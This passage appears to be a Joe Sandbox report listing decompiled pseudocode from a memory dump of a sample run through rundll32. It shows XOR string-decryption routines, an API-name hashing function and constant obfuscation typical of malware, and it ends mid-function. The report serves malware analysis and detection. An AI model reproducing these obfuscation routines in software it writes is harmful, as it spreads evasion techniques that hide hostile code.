                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ]0
                                                                                                                                    • API String ID: 0-3096761382
                                                                                                                                    • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                    • Instruction ID: 6d2a75810c98e5731fdcaea05ff3c7620e654f3dc629b81781e1e37400ff86ba
                                                                                                                                    • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                    • Instruction Fuzzy Hash: 473178716193008FD318CF29C88594BFBE5EBC9708F108A2EF58993351E775DD058B56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002C3C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				char _v564;
                                                                                                                                    				void* _t97;
                                                                                                                                    				signed int _t114;
                                                                                                                                    				signed int _t115;
                                                                                                                                    				signed int _t116;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t97);
                                                                                                                                    				_v32 = 0xf161c0;
                                                                                                                                    				_v32 = _v32 + 0xffff8ad4;
                                                                                                                                    				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                                    				_v28 = 0xfc9039;
                                                                                                                                    				_t114 = 0x1b;
                                                                                                                                    				_v28 = _v28 / _t114;
                                                                                                                                    				_t115 = 5;
                                                                                                                                    				_v28 = _v28 * 0x6e;
                                                                                                                                    				_v28 = _v28 ^ 0x040e4771;
                                                                                                                                    				_v44 = 0x2ba482;
                                                                                                                                    				_v44 = _v44 | 0x0543644d;
                                                                                                                                    				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                                    				_v36 = 0xddb19;
                                                                                                                                    				_t116 = 0x23;
                                                                                                                                    				_v36 = _v36 / _t115;
                                                                                                                                    				_v36 = _v36 ^ 0x000396ce;
                                                                                                                                    				_v8 = 0xc420c0;
                                                                                                                                    				_v8 = _v8 >> 8;
                                                                                                                                    				_v8 = _v8 + 0xffff6316;
                                                                                                                                    				_v8 = _v8 * 0x7a;
                                                                                                                                    				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                                    				_v12 = 0xb92025;
                                                                                                                                    				_v12 = _v12 >> 3;
                                                                                                                                    				_v12 = _v12 + 0xfe32;
                                                                                                                                    				_v12 = _v12 << 0xe;
                                                                                                                                    				_v12 = _v12 ^ 0x088e8322;
                                                                                                                                    				_v24 = 0x144a1a;
                                                                                                                                    				_v24 = _v24 + 0xffffa246;
                                                                                                                                    				_v24 = _v24 + 0xffff01e3;
                                                                                                                                    				_v24 = _v24 ^ 0x001122d6;
                                                                                                                                    				_v16 = 0x7d3361;
                                                                                                                                    				_v16 = _v16 / _t116;
                                                                                                                                    				_v16 = _v16 << 4;
                                                                                                                                    				_v16 = _v16 >> 9;
                                                                                                                                    				_v16 = _v16 ^ 0x00004840;
                                                                                                                                    				_v20 = 0xb3d6e6;
                                                                                                                                    				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                                    				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                                    				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                                    				_v40 = 0xbcf254;
                                                                                                                                    				_v40 = _v40 << 0xc;
                                                                                                                                    				_v40 = _v40 ^ 0xcf275652;
                                                                                                                                    				_push(_v44);
                                                                                                                                    				_push(_v28);
                                                                                                                                    				E002CA918(_a4, _v40, _v36, _v8, E002DDCF7(_v32, 0x2c17c0, _v40), _v12,  &_v564);
                                                                                                                                    				E002CA8B0(_v24, _t107, _v16);
                                                                                                                                    				return E002D1F8A(_v20, _v40,  &_v564);
                                                                                                                                    			}



















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: a3}
                                                                                                                                    • API String ID: 0-1821053108
                                                                                                                                    • Opcode ID: 7a05b67599be5ef4fd20eff8969e096077025e95017a3a7d59f8dc64f2640307
                                                                                                                                    • Instruction ID: 15abc39ee9abb535049570c46c69a99ec8076aeb768408b13c18df19960c85c6
                                                                                                                                    • Opcode Fuzzy Hash: 7a05b67599be5ef4fd20eff8969e096077025e95017a3a7d59f8dc64f2640307
                                                                                                                                    • Instruction Fuzzy Hash: 0741F172D0120AEBCF09CFE0D94A9EEBBB2FB44314F20815AE510B6260D7B55B55DFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D8606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                    				void* _t46;
                                                                                                                                    				signed int _t50;
                                                                                                                                    				unsigned int* _t63;
                                                                                                                                    				signed int _t64;
                                                                                                                                    				signed int _t66;
                                                                                                                                    				signed int _t72;
                                                                                                                                    				unsigned int _t73;
                                                                                                                                    				unsigned int _t74;
                                                                                                                                    				unsigned int* _t78;
                                                                                                                                    				signed int* _t79;
                                                                                                                                    				signed int* _t80;
                                                                                                                                    				unsigned int _t82;
                                                                                                                                    				void* _t88;
                                                                                                                                    				void* _t90;
                                                                                                                                    				void* _t92;
                                                                                                                                    				void* _t93;
                                                                                                                                    
                                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t46);
                                                                                                                                    				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                                    				_t79 =  &(__edx[1]);
                                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                                    				 *(_t92 + 0x28) = 0xf8496b;
                                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
                                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                                    				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                                    				_t66 =  *__edx;
                                                                                                                                    				_t80 =  &(_t79[1]);
                                                                                                                                    				_t50 =  *_t79 ^ _t66;
                                                                                                                                    				 *(_t92 + 0x2c) = _t66;
                                                                                                                                    				 *(_t92 + 0x30) = _t50;
                                                                                                                                    				_t30 = _t50 + 1; // 0xb
                                                                                                                                    				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                                    				_t93 = _t92 + 0xc;
                                                                                                                                    				_t63 = E002C7FF2(_t82);
                                                                                                                                    				 *(_t93 + 0x1c) = _t63;
                                                                                                                                    				if(_t63 != 0) {
                                                                                                                                    					_t90 = 0;
                                                                                                                                    					_t78 = _t63;
                                                                                                                                    					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                                    					if(_t88 != 0) {
                                                                                                                                    						_t64 =  *(_t93 + 0x1c);
                                                                                                                                    						do {
                                                                                                                                    							_t72 =  *_t80;
                                                                                                                                    							_t80 =  &(_t80[1]);
                                                                                                                                    							_t73 = _t72 ^ _t64;
                                                                                                                                    							 *_t78 = _t73;
                                                                                                                                    							_t78 =  &(_t78[1]);
                                                                                                                                    							_t74 = _t73 >> 0x10;
                                                                                                                                    							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                                    							 *(_t78 - 2) = _t74;
                                                                                                                                    							_t90 = _t90 + 1;
                                                                                                                                    							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                                    						} while (_t90 < _t88);
                                                                                                                                    						_t63 =  *(_t93 + 0x18);
                                                                                                                                    					}
                                                                                                                                    					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                                    				}
                                                                                                                                    				return _t63;
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: &#
                                                                                                                                    • API String ID: 0-2240308938
                                                                                                                                    • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                    • Instruction ID: 6d34377f5ba4d4d1e52c472f79cf6d7286ac3e431c82542b8fcce94ffafc4168
                                                                                                                                    • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                    • Instruction Fuzzy Hash: 4B3159726183518FC305DF28C88581BFBE0FF98718F054B6DE88AA7211D774EA19CB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002DDCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                    				void* _t39;
                                                                                                                                    				signed int _t43;
                                                                                                                                    				signed int _t60;
                                                                                                                                    				signed int _t61;
                                                                                                                                    				signed int _t63;
                                                                                                                                    				signed int _t70;
                                                                                                                                    				unsigned int _t71;
                                                                                                                                    				unsigned int _t72;
                                                                                                                                    				signed int _t76;
                                                                                                                                    				signed int* _t77;
                                                                                                                                    				signed int* _t78;
                                                                                                                                    				unsigned int _t80;
                                                                                                                                    				void* _t86;
                                                                                                                                    				short _t88;
                                                                                                                                    				void* _t90;
                                                                                                                                    				void* _t91;
                                                                                                                                    
                                                                                                                                    				_push( *(_t90 + 0x28));
                                                                                                                                    				_push( *(_t90 + 0x28));
                                                                                                                                    				_push(__edx);
                                                                                                                                    				E002D20B9(_t39);
                                                                                                                                    				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                                    				_t77 =  &(__edx[1]);
                                                                                                                                    				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                                    				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                                    				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                                    				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                                    				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                                    				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                                    				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                                    				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                                    				_t63 =  *__edx;
                                                                                                                                    				_t78 =  &(_t77[1]);
                                                                                                                                    				_t43 =  *_t77 ^ _t63;
                                                                                                                                    				 *(_t90 + 0x28) = _t63;
                                                                                                                                    				 *(_t90 + 0x2c) = _t43;
                                                                                                                                    				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                                    				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                                    				_t91 = _t90 + 8;
                                                                                                                                    				_t60 = E002C7FF2(_t80 + _t80);
                                                                                                                                    				 *(_t91 + 0x1c) = _t60;
                                                                                                                                    				if(_t60 != 0) {
                                                                                                                                    					_t88 = 0;
                                                                                                                                    					_t76 = _t60;
                                                                                                                                    					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                                    					if(_t86 != 0) {
                                                                                                                                    						_t61 =  *(_t91 + 0x1c);
                                                                                                                                    						do {
                                                                                                                                    							_t70 =  *_t78;
                                                                                                                                    							_t78 =  &(_t78[1]);
                                                                                                                                    							_t71 = _t70 ^ _t61;
                                                                                                                                    							 *_t76 = _t71 & 0x000000ff;
                                                                                                                                    							_t76 = _t76 + 8;
                                                                                                                                    							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                                    							_t72 = _t71 >> 0x10;
                                                                                                                                    							_t88 = _t88 + 1;
                                                                                                                                    							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                                    							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                                    						} while (_t88 < _t86);
                                                                                                                                    						_t60 =  *(_t91 + 0x18);
                                                                                                                                    					}
                                                                                                                                    					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                                    				}
                                                                                                                                    				return _t60;
                                                                                                                                    			}




















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: g|E
                                                                                                                                    • API String ID: 0-3824901942
                                                                                                                                    • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                    • Instruction ID: 771f85cc3f89416af91f0a49c8da626feb65c70741d36fa50a5159dcf3850d88
                                                                                                                                    • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                    • Instruction Fuzzy Hash: 5131AE766183128FC714DF29C48146AF7E0FF98318F414B6EE889AB251D774EA09CF96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C51BB() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				void* _t72;
                                                                                                                                    				intOrPtr _t83;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				signed int _t89;
                                                                                                                                    
                                                                                                                                    				_v28 = _v28 & 0x00000000;
                                                                                                                                    				_v32 = 0x54cf7d;
                                                                                                                                    				_v16 = 0x3835ff;
                                                                                                                                    				_v16 = _v16 >> 0xa;
                                                                                                                                    				_v16 = _v16 * 0x17;
                                                                                                                                    				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                                    				_t72 = 0xe98fb1d;
                                                                                                                                    				_v24 = 0x583681;
                                                                                                                                    				_t87 = 0x44;
                                                                                                                                    				_v24 = _v24 / _t87;
                                                                                                                                    				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                                    				_v12 = 0x832b1f;
                                                                                                                                    				_v12 = _v12 << 5;
                                                                                                                                    				_v12 = _v12 | 0x242a8544;
                                                                                                                                    				_v12 = _v12 ^ 0x346a2866;
                                                                                                                                    				_v8 = 0x6a77bb;
                                                                                                                                    				_v8 = _v8 >> 0xe;
                                                                                                                                    				_t88 = 0x19;
                                                                                                                                    				_v8 = _v8 / _t88;
                                                                                                                                    				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                                    				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                                    				_v20 = 0x4802c8;
                                                                                                                                    				_t89 = 0x21;
                                                                                                                                    				_v20 = _v20 / _t89;
                                                                                                                                    				_v20 = _v20 + 0xffffbfc3;
                                                                                                                                    				_v20 = _v20 ^ 0x000df493;
                                                                                                                                    				do {
                                                                                                                                    					while(_t72 != 0x9835b86) {
                                                                                                                                    						if(_t72 == 0xe98fb1d) {
                                                                                                                                    							_push(_t72);
                                                                                                                                    							_push(_t72);
                                                                                                                                    							 *0x2e3e04 = E002C7FF2(0x134);
                                                                                                                                    							_t72 = 0x9835b86;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L5;
                                                                                                                                    					}
                                                                                                                                    					_t83 =  *0x2e3e04; // 0x0
                                                                                                                                    					E002D0001(_v8, _t83 + 0x18, _v20);
                                                                                                                                    					_t72 = 0x7dce4e4;
                                                                                                                                    					L5:
                                                                                                                                    				} while (_t72 != 0x7dce4e4);
                                                                                                                                    				return 1;
                                                                                                                                    			}
















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: f(j4
                                                                                                                                    • API String ID: 0-3086030595
                                                                                                                                    • Opcode ID: 7c17a3ba5dcbd69e9c406eb4b360d410cc18587a8dd1b1f2830e0810b2b2ac2d
                                                                                                                                    • Instruction ID: b0cdc2685e909374d52179867546c0a7e5906f1cd00e7bde3b82a23e321cb8d9
                                                                                                                                    • Opcode Fuzzy Hash: 7c17a3ba5dcbd69e9c406eb4b360d410cc18587a8dd1b1f2830e0810b2b2ac2d
                                                                                                                                    • Instruction Fuzzy Hash: CA316871E11219ABCF08DFAAD9899EEBBB1FB44324F20819DE405AB250D3B45E55CF81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C2051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				void* _t71;
                                                                                                                                    				signed int _t78;
                                                                                                                                    				signed int _t80;
                                                                                                                                    				signed int _t83;
                                                                                                                                    				signed int _t92;
                                                                                                                                    				signed int _t95;
                                                                                                                                    				signed short* _t97;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_t97 = _a4;
                                                                                                                                    				_push(_t97);
                                                                                                                                    				E002D20B9(_t71);
                                                                                                                                    				_v16 = 0x71ca23;
                                                                                                                                    				_v12 = 0x57f692;
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_v20 = 0xd3252c;
                                                                                                                                    				_v20 = _v20 + 0x4351;
                                                                                                                                    				_v20 = _v20 + 0xffff5b79;
                                                                                                                                    				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                                    				_a4 = 0xbb067e;
                                                                                                                                    				_t83 = 0x11;
                                                                                                                                    				_a4 = _a4 / _t83;
                                                                                                                                    				_a4 = _a4 >> 8;
                                                                                                                                    				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                    				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                    				_a4 = 0xab60c2;
                                                                                                                                    				_a4 = _a4 << 0x10;
                                                                                                                                    				_a4 = _a4 ^ 0x910d5570;
                                                                                                                                    				_a4 = _a4 >> 4;
                                                                                                                                    				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                    				if( *_t97 != 0) {
                                                                                                                                    					do {
                                                                                                                                    						_t80 = _v20;
                                                                                                                                    						_a4 = 0xbb067e;
                                                                                                                                    						_a4 = _a4 / _t83;
                                                                                                                                    						_a4 = _a4 >> 8;
                                                                                                                                    						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                    						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                    						_a4 = 0xab60c2;
                                                                                                                                    						_a4 = _a4 << 0x10;
                                                                                                                                    						_a4 = _a4 ^ 0x910d5570;
                                                                                                                                    						_a4 = _a4 >> 4;
                                                                                                                                    						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                    						_t92 = _v20 << _a4;
                                                                                                                                    						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                                    						_t95 = _v20 << _a4;
                                                                                                                                    						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                                    							_t78 = _t78 + 0x20;
                                                                                                                                    						}
                                                                                                                                    						_v20 = _t78;
                                                                                                                                    						_t97 =  &(_t97[1]);
                                                                                                                                    						_v20 = _v20 + _t92;
                                                                                                                                    						_v20 = _v20 + _t95;
                                                                                                                                    						_v20 = _v20 - _t80;
                                                                                                                                    						_t83 = 0x11;
                                                                                                                                    					} while ( *_t97 != 0);
                                                                                                                                    				}
                                                                                                                                    				return _v20;
                                                                                                                                    			}
















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: QC
                                                                                                                                    • API String ID: 0-229404352
                                                                                                                                    • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                    • Instruction ID: 04036478e34abf4cca234606d5f48e9d8532877727d51073550d1ceda53c227a
                                                                                                                                    • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                    • Instruction Fuzzy Hash: 8C3135718183818BD315DF29C48941BBBE0FFD87A8F548E1DF4C9A2225D7B5C688CB56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002D176B(void* __ecx, void* __eflags) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				signed int _t91;
                                                                                                                                    				signed int _t92;
                                                                                                                                    				signed int _t93;
                                                                                                                                    				void* _t102;
                                                                                                                                    				signed int _t103;
                                                                                                                                    
                                                                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                                                                    				_v40 = 0x355323;
                                                                                                                                    				_v24 = 0x6eb9b5;
                                                                                                                                    				_v24 = _v24 + 0x6c21;
                                                                                                                                    				_t102 = __ecx;
                                                                                                                                    				_t91 = 0x64;
                                                                                                                                    				_v24 = _v24 / _t91;
                                                                                                                                    				_v24 = _v24 ^ 0x0005c519;
                                                                                                                                    				_v32 = 0xba69a0;
                                                                                                                                    				_v32 = _v32 << 7;
                                                                                                                                    				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                                    				_v20 = 0x99612d;
                                                                                                                                    				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                                    				_v20 = _v20 + 0x66ac;
                                                                                                                                    				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                                    				_v16 = 0xd72900;
                                                                                                                                    				_v16 = _v16 + 0xffff2462;
                                                                                                                                    				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                                    				_v16 = _v16 + 0xffff7578;
                                                                                                                                    				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                                    				_v12 = 0xeb6610;
                                                                                                                                    				_t92 = 0x6f;
                                                                                                                                    				_v12 = _v12 / _t92;
                                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                                    				_v12 = _v12 ^ 0x2e835447;
                                                                                                                                    				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                                    				_v28 = 0x644f8d;
                                                                                                                                    				_v28 = _v28 << 3;
                                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                                    				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                                    				_v8 = 0xbb77ef;
                                                                                                                                    				_t93 = 0x72;
                                                                                                                                    				_v8 = _v8 * 0x3c;
                                                                                                                                    				_v8 = _v8 / _t93;
                                                                                                                                    				_v8 = _v8 << 6;
                                                                                                                                    				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                                    				_t87 = E002D0AE0(_v8, _v28);
                                                                                                                                    				_push(_v12);
                                                                                                                                    				_t103 = _t87;
                                                                                                                                    				_push(_t102);
                                                                                                                                    				_push(_t103);
                                                                                                                                    				_push(3);
                                                                                                                                    				E002C80E3(_v20, _v16);
                                                                                                                                    				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                                    				return 0;
                                                                                                                                    			}


















                                                                                                                                    0x002d186c
                                                                                                                                    0x002d1871
                                                                                                                                    0x002d1872
                                                                                                                                    0x002d1873
                                                                                                                                    0x002d1875
                                                                                                                                    0x002d187f
                                                                                                                                    0x002d1888

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #S5
                                                                                                                                    • API String ID: 0-40889119
                                                                                                                                    • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                    • Instruction ID: 9bbb3538ccd6b10bb6af1dd2521eebecb7202ecd5cffe1e84d3eeb227820cc93
                                                                                                                                    • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                    • Instruction Fuzzy Hash: 543132B2D0020AEBCB48DFE5C94AAEEBBB1FB44304F20809AD515B6260D7B50B15CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E09B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				char _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				intOrPtr _v52;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				signed int _t89;
                                                                                                                                    
                                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                                    				_v32 = 4;
                                                                                                                                    				_v52 = 0xab6069;
                                                                                                                                    				_v48 = 0xcf1f96;
